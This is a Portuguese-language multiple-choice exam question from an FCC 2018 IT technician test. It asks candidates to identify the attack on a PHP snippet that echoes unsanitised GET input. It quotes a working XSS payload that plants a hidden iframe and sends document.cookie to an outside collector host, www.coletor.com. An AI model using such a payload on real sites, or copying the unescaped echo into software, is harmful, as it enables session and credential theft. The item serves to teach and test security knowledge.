Questão de Programação — Linguagens de programação — FCC 2018
ProgramaçãoLinguagens de programação
- Código
- fc050905
- Banca
- FCC
- Órgão
- TRT - 2ª REGIÃO (SP)
- Ano
- 2018
- Cargo
- Técnico Judiciário - Tecnologia da Informação
Considere o trecho de programa PHP abaixo.<?phpsetcookie('PHPSSESID', 'meu_sid');setcookie('login', 'meu_login');setcookie('senha', 'minha_senha');echo $_GET['var'];?>Supondo que ao executar este trecho, um usuário passou como entrada:<script>document.write('<iframe width=1 height=1src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')</script>cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.comUm Técnico de TI conclui corretamente que
- Ao trecho com a instrução echo imprime os dados passados pelo usuário, sem oferecer vulnerabilidades ao site alvo.
- Bnada ocorrerá, pois o usuário não poderia passar a entrada indicada.
- Co navegador, ao perceber que a entrada se trata de um script, encerrará o código sem executar o echo.
- Dtrata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.
- Etrata-se de um ataque do tipo SQL-Injection, pois o usuário invasor inseriu uma consulta que será enviada diretamente para o banco de dados relacional.